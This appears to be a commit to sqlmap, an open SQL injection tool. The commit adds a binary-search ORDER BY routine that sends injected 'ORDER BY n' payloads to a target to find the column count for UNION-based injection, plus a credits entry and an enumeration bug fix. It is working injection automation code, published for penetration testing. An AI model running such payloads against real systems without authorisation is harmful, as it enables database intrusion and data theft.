ORDER BY technique used for finding proper UNION col count (dramatical improvement of speed and capabilities) and one minor bug fix

2024-11-24 18:43:47 +03:00 · 2011-08-03 09:08:16 +00:00 · 2011-08-03 09:08:16 +00:00 · 9423d15fb3
commit 9423d15fb3
parent 07afcd5440
5 changed files with 54 additions and 4 deletions
--- a/doc/THANKS
+++ b/doc/THANKS
@ -532,6 +532,9 @@ Anthony Zboralski <anthony.zboralski@bellua.com>
 Thierry Zoller <thierry@zoller.lu>
    for reporting a couple of major bugs

+Zhen Zhou <zhouzhenster@gmail.com>
+    for suggesting a feature
+
 -insane- <insane_@gmx.de>
    for reporting a minor bug

--- a/lib/core/option.py
+++ b/lib/core/option.py
@ -1424,6 +1424,7 @@ def __setKnowledgeBaseAttributes(flushAll=True):
    kb.nullConnection = None
    kb.pageTemplate = None
    kb.pageTemplates = dict()
+    kb.orderByColumns = None
    kb.originalPage = None

    # Back-end DBMS underlying operating system fingerprint via banner (-b)
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@ -388,3 +388,6 @@ BIGARRAY_CHUNK_LENGTH = 4096

 # Only console display last n table rows
 TRIM_STDOUT_DUMP_SIZE = 1024
+
+# Step used in ORDER BY technique used for finding the right number of columns in UNION query injections
+ORDER_BY_STEP = 10
--- a/lib/techniques/union/test.py
+++ b/lib/techniques/union/test.py
@ -21,8 +21,10 @@ from lib.core.common import getUnicode
 from lib.core.common import listToStrValue
 from lib.core.common import popValue
 from lib.core.common import pushValue
+from lib.core.common import randomInt
 from lib.core.common import randomStr
 from lib.core.common import removeReflectiveValues
+from lib.core.common import singleTimeLogMessage
 from lib.core.common import singleTimeWarnMessage
 from lib.core.common import stdev
 from lib.core.common import wasLastRequestDBMSError
@ -39,6 +41,7 @@ from lib.core.settings import MIN_RATIO
 from lib.core.settings import MAX_RATIO
 from lib.core.settings import MIN_STATISTICAL_RANGE
 from lib.core.settings import MIN_UNION_RESPONSES
+from lib.core.settings import ORDER_BY_STEP
 from lib.core.unescaper import unescaper
 from lib.parse.html import htmlParser
 from lib.request.comparison import comparison
@ -50,11 +53,53 @@ def __findUnionCharCount(comment, place, parameter, value, prefix, suffix, where
    """
    retVal = None

+    def __orderByTechnique():
+        def __orderByTest(cols):
+            query = agent.prefixQuery("ORDER BY %d" % cols, prefix=prefix)
+            query = agent.suffixQuery(query, suffix=suffix, comment=comment)
+            payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where)
+            page, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
+            return not re.search(r"((warning|error)[^\n]*order)|(order by)", page or "", re.I)
+
+        if __orderByTest(1) and not __orderByTest(randomInt()):
+            infoMsg = "ORDER BY technique seems to be usable. "
+            infoMsg += "this should dramatically reduce the "
+            infoMsg += "time needed to find the right number "
+            infoMsg += "of query columns. Automatically extending the "
+            infoMsg += "range for UNION query injection technique"
+            singleTimeLogMessage(infoMsg)
+
+            lowCols, highCols = 1, ORDER_BY_STEP
+            found = None
+            while not found:
+                if __orderByTest(highCols):
+                    lowCols = highCols
+                    highCols += ORDER_BY_STEP
+                else:
+                    while not found:
+                        mid = highCols - (highCols - lowCols) / 2
+                        if __orderByTest(mid):
+                            lowCols = mid
+                        else:
+                            highCols = mid
+                        if (highCols - lowCols) < 2:
+                            found = lowCols
+
+            return found
+
    pushValue(kb.errorIsNone)
    items, ratios = [], []
    kb.errorIsNone = False
    lowerCount, upperCount = conf.uColsStart, conf.uColsStop

+    if lowerCount == 1:
+        found = kb.orderByColumns or __orderByTechnique()
+        if found:
+            kb.orderByColumns = found
+            infoMsg = "target url appears to have %d columns in query" % found
+            singleTimeLogMessage(infoMsg)
+            return found
+
    if abs(upperCount - lowerCount) < MIN_UNION_RESPONSES:
        upperCount = lowerCount + MIN_UNION_RESPONSES

--- a/plugins/generic/enumeration.py
+++ b/plugins/generic/enumeration.py
@ -2031,10 +2031,8 @@ class Enumeration:
                query += exclDbsQuery
                values = inject.getValue(query, blind=False)

-                if not isNoneValue(values):
-                    if isinstance(values, basestring):
-                        values = [ values ]
-
+                if not any([isNoneValue(values), isinstance(values, basestring)]):
+                    values = filter(lambda x: isinstance(x, (tuple, list, set)) and len(x) == 2, values)
                    for foundDb, foundTbl in values:
                        foundDb = safeSQLIdentificatorNaming(foundDb)
                        foundTbl = safeSQLIdentificatorNaming(foundTbl, True)